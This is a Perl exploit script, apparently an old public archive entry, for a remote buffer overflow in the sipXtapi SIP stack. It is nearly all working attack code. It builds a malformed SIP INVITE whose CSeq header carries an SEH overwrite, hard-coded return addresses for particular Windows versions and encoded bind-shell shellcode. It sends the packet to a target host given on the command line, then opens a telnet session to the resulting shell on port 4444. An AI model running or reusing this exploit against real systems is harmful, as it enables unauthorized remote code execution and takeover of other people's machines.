SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow

#!/usr/bin/perl
# 
# Remote Buffer Overflow in sipXtapi
# 
# bad char 0x00 0x09 0x0a 0x0d 0x20
#


use IO::Socket;
#use strict;

print "\n\n";
print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaro\n\n";
print "tested on sipXphone 2.6.0.27 read the code for ret address\n\n";

if (not $ARGV[0]) {
        print "Usage: sipx.pl <host>\n";
exit;}

$target=$ARGV[0];
my $source ="127.0.0.1";
my $target_port = 5060;
my $user ="bad";
my $nextseh = "\xeb\x06\x90\x90";
my $seh="\xb0\x67\x01\x08";	# pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ?
#my $seh="\x27\x13\x02\x08";	# call ebx in jvm.dll for win2k Pro SP0 Italian universal ?
#my $seh="\x22\x92\x06\x08";	# jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ? 
				# if you use this ret you can exploits the target host many times
my $nop = "\x90"x32;


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode = 
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25".
"\xe3\xa5\x9f\x83\xeb\xfc\xe2\xf4\xd9\x89\x4e\xd2\xcd\x1a\x5a\x60".
"\xda\x83\x2e\xf3\x01\xc7\x2e\xda\x19\x68\xd9\x9a\x5d\xe2\x4a\x14".
"\x6a\xfb\x2e\xc0\x05\xe2\x4e\xd6\xae\xd7\x2e\x9e\xcb\xd2\x65\x06".
"\x89\x67\x65\xeb\x22\x22\x6f\x92\x24\x21\x4e\x6b\x1e\xb7\x81\xb7".
"\x50\x06\x2e\xc0\x01\xe2\x4e\xf9\xae\xef\xee\x14\x7a\xff\xa4\x74".
"\x26\xcf\x2e\x16\x49\xc7\xb9\xfe\xe6\xd2\x7e\xfb\xae\xa0\x95\x14".
"\x65\xef\x2e\xef\x39\x4e\x2e\xdf\x2d\xbd\xcd\x11\x6b\xed\x49\xcf".
"\xda\x35\xc3\xcc\x43\x8b\x96\xad\x4d\x94\xd6\xad\x7a\xb7\x5a\x4f".
"\x4d\x28\x48\x63\x1e\xb3\x5a\x49\x7a\x6a\x40\xf9\xa4\x0e\xad\x9d".
"\x70\x89\xa7\x60\xf5\x8b\x7c\x96\xd0\x4e\xf2\x60\xf3\xb0\xf6\xcc".
"\x76\xb0\xe6\xcc\x66\xb0\x5a\x4f\x43\x8b\xb4\xc3\x43\xb0\x2c\x7e".
"\xb0\x8b\x01\x85\x55\x24\xf2\x60\xf3\x89\xb5\xce\x70\x1c\x75\xf7".
"\x81\x4e\x8b\x76\x72\x1c\x73\xcc\x70\x1c\x75\xf7\xc0\xaa\x23\xd6".
"\x72\x1c\x73\xcf\x71\xb7\xf0\x60\xf5\x70\xcd\x78\x5c\x25\xdc\xc8".
"\xda\x35\xf0\x60\xf5\x85\xcf\xfb\x43\x8b\xc6\xf2\xac\x06\xcf\xcf".
"\x7c\xca\x69\x16\xc2\x89\xe1\x16\xc7\xd2\x65\x6c\x8f\x1d\xe7\xb2".
"\xdb\xa1\x89\x0c\xa8\x99\x9d\x34\x8e\x48\xcd\xed\xdb\x50\xb3\x60".
"\x50\xa7\x5a\x49\x7e\xb4\xf7\xce\x74\xb2\xcf\x9e\x74\xb2\xf0\xce".
"\xda\x33\xcd\x32\xfc\xe6\x6b\xcc\xda\x35\xcf\x60\xda\xd4\x5a\x4f".
"\xae\xb4\x59\x1c\xe1\x87\x5a\x49\x77\x1c\x75\xf7\xd5\x69\xa1\xc0".
"\x76\x1c\x73\x60\xf5\xe3\xa5\x9f";
my $cseq =("\x41"x204).$nextseh.$seh.$nop.$shellcode;


my $packet =<<END;
INVITE sip:user\@$source SIP/2.0\r
To: <sip:$target:$target_port>\r
Via: SIP/2.0/UDP $target:3277\r
From: "moz"<sip:$target:3277>\r
Call-ID: 3121$target\r
CSeq: $cseq\r
Max-Forwards: 70\r
Contact: <sip:$source:5059>\r
\r
END

print "Sending Packet to: " . $target . "\n\n";
socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));
my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);
send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n";
print "Done.\n";
$host = $ARGV[0];

print " + connect to $host on port 4444...\n";

system("telnet $host 4444");

# milw0rm.com [2006-07-24]